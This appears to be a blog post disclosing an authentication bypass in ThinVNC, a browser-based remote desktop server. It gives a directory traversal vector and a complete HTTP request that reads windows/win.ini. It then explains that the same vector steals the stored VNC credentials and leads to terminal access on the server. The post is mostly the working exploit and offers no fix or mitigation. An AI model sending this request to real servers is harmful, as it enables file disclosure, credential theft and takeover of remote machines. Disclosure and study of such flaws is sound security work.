Thin-VNC Remote Authentication bypass

0

ThinVNC can be downloaded from sourceforge and the source code for this is available at github. According to it’s author ThinVNC is a pure HTML5 & AJAX Remote Desktop implementation. ThinVNC works on any HTML5-compliant web browser. Users can access a remote PC from any computer or mobile OS; no additional plugin or installation will be required on the client side.

hinVNC uses Basic Authentication to authenticate a user to access the web VNC interface. Credentials to be used are set on the server side while deploying the VNC server. There is no fixed port on which VNC server runs, you can run the VNC server on any port pre-configured.

A sample authentication screen looks like this:

When tried with multiple with wrong authentication credentials, it throws a HTTP 401 error. This can be bypassed using the following vector:
/../../../../../../../../../windows/win.ini
Sample Request:

GET /xyz/../../../../../../../../../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 192.168.40.1:5888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

This directory traversal attack vector allows us to read any arbitrary file on the system. We can use the same vector to steal the credentials for the VNC client. Once we steal them, we can use the credentials to compromise the VNC server. Post compromise, we get terminal access to the VNC server.

LEAVE A REPLY

Please enter your comment!
Please enter your name here